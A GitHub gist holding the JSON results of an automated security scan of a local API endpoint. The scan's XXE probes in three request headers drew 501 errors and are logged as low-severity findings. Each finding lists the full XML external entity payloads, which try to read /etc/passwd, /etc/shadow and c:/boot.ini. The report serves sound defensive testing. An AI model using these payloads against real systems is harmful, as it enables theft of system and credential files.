Skip to content

Instantly share code, notes, and snippets.

@MCDong
Created April 13, 2016 16:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save MCDong/1cc3775d2e43381bc55072df1a43b375 to your computer and use it in GitHub Desktop.
Save MCDong/1cc3775d2e43381bc55072df1a43b375 to your computer and use it in GitHub Desktop.
{
"errors": [],
"failures": {
"localhost:8000/v3/domains": {
"XML_ENTITY_HEADERS": {
"POST - headers|Accept": {
"500_errors": {
"confidence": "High",
"description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
"payloads": [
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
],
"severity": "Low"
}
},
"POST - headers|Content-type": {
"500_errors": {
"confidence": "High",
"description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
"payloads": [
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
],
"severity": "Low"
}
},
"POST - headers|X-Auth-Token": {
"500_errors": {
"confidence": "High",
"description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
"payloads": [
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
],
"severity": "Low"
}
}
}
}
},
"stats": {
"errors": 0,
"failures": 9,
"successes": 0
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment